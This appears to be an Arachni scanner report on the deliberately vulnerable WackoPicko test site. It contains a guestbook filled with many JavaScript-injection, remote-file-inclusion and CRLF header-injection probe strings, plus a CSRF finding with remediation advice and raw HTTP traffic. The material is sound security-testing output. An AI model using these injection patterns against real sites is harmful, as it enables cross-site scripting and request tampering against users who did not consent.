    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
                <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
                <p class="comment">1</p>
        <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
                <p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
        <p> - by arachni_name </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Cross-Site Request Forgery 2 csrf

In the majority of today’s web applications, clients are required to submit forms which can perform sensitive operations.

An example of such a form being used would be when an administrator wishes to create a new user for the application.

In the simplest version of the form, the administrator would fill-in:

  • Name
  • Password
  • Role (level of access)

Continuing with this example, Cross Site Request Forgery (CSRF) would occur when the administrator is tricked into clicking on a link, which if logged into the application, would automatically submit the form without any further interaction.

Cyber-criminals will look for sites where sensitive functions are performed in this manner and then craft malicious requests that will be used against clients via a social engineering attack.

There are 3 things that are required for a CSRF attack to occur:

  1. The form must perform some sort of sensitive action.
  2. The victim (the administrator the example above) must have an active session.
  3. Most importantly, all parameter values must be known or guessable.

Arachni discovered that all parameters within the form were known or predictable and therefore the form could be vulnerable to CSRF.

Manual verification may be required to check whether the submission will then perform a sensitive action, such as reset a password, modify user profiles, post content on a forum, etc.

Remediation guidance

Based on the risk (determined by manual verification) of whether the form submission performs a sensitive action, the addition of anti-CSRF tokens may be required.

These tokens can be configured in such a way that each session generates a new anti-CSRF token or such that each individual request requires a new token.

It is important that the server track and maintain the status of each token (in order to reject requests accompanied by invalid ones) and therefore prevent cyber-criminals from knowing, guessing or reusing them.

For examples of framework specific remediation options, please refer to the references.

Proof
<form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST">
  <input type="hidden" name="MAX_FILE_SIZE" value="30000">
  </input>
  Check this file:
  <input name="userfile" type="file">
  </input>
  <br>
  </br>
  With this name:
  <input name="name" type="text">
  </input>
  <br>
  </br>
  <br>
  </br>
  <input type="submit" value="Send File">
  </input>
  <br>
  </br>
</form>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST">
  <input type="hidden" name="MAX_FILE_SIZE" value="30000">
  </input>
  Check this file:
  <input name="userfile" type="file">
  </input>
  <br>
  </br>
  With this name:
  <input name="name" type="text">
  </input>
  <br>
  </br>
  <br>
  </br>
  <input type="submit" value="Send File">
  </input>
  <br>
  </br>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/piccheck.php
MAX_FILE_SIZE
30000
userfile
name
MAX_FILE_SIZE
30000
userfile
name
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 3.950414 load page
URL http://192.168.0.26/WackoPicko/
1 2.996451 request http://192.168.0.26/WackoPicko/
2 0.337047 request http://192.168.0.26/WackoPicko/css/stylings.php

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Accept-Language: en-CA,*

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br>
    But that's not all, you can also buy the rights to the high quality <br>
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  <p></p>
  <p>
    </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br>
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  <p></p>
</div>


       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
